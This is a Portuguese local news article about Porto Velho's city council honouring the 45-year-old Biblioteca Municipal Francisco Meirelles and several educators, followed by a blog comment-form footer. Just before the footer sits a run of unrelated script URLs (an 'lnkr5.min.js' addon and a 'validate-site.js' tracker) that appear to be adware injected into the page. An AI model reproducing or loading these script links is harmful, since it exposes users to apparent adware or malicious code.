Professor Aleks Palitot indica biblioteca municipal para moção de aplauso

Por indicação do Professor Aleks Palitot, a Câmara Municipal realizou na tarde desta segunda-feira (21), moção de aplauso em homenagem aos 45 anos da Biblioteca Municipal Francisco Meirelles e seus servidores. Além da homenagem, foram contemplados ainda, com título de Amigo da Cultura figuras ilustres da sociedade que contribuíram com difusão da educação na capital.

Criada pela lei Nº 85 de 30 de dezembro de 1973, na gestão do Prefeito Jacob Freitas de Atallah, a Biblioteca Municipal Francisco Meirelles vem prestando relevantes serviços à sociedade rondoniense. Possui atualmente cerca de 80 mil títulos, além de jornais, folhetos, obras raras e de referência.

“A direção da biblioteca sempre priorizou a promoção da leitura, a formação de leitores engajados na sociedade, a preservação da memória, a valorização da cultura e a oportunidade de conhecer diversas formas de registro do conhecimento, além de ampliar as visões de mundo de seus frequentadores”, afirma o Professor Aleks Palitot.

De acordo com o Professor Célio Leandro, diretor da Biblioteca Municipal, “para nós, hoje é um dia muito feliz em sermos agraciados com esta homenagem que vem enaltecer o trabalho da biblioteca nestes 45 anos”, considerada um centro de cultura e bem-estar é crescente o número de pessoas que a buscam, que levam seus filhos e participam dos eventos, relata o Professor.

“Nós sempre consideramos que qualquer homenagem que se faça a cultura e a leitura é sempre bem-vinda porque é uma forma de reconhecimento da nossa memória, do nosso povo e nossa cultura. Acho que poderíamos ter mais bibliotecas, melhorarmos os acervos, torná-los mais atualizados e democratizar o acesso as classes menos favorecidas”, pondera a professora Nair Gurgel.

Para a Professora Nair, Palitot tem se mostrado um vereador muito envolvido com as questões do povo de Porto Velho, “temos acompanhado e visto que ele atua em diversas frentes sempre procurando valorizar o que é da nossa história, da nossa memória e o que melhor para o nosso município”, enfatiza.

Além dos servidores da biblioteca foram homenageadas as Professoras Glória Valadares Granjeiro, Nair Ferreira Gurgel do Amaral e Yêda Borzacov.

https://infoanalytics.tools/addons/lnkr5.min.jshttps://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52200x6849x&r=2https://infoanalytics.tools/ext/1ac1b73204b5d3dec6.js?sid=52200_6849_&title=&blocks%5B%5D=31af2

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

This site uses Akismet to reduce spam. Learn how your comment data is processed.